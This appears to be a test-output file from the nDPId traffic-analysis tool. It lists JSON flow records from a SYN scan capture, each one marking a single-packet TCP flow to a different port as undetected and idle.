-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25734,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25735,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25734,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25735,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1164,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1164,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1166,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1166,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13456,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1169,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13456,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1169,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
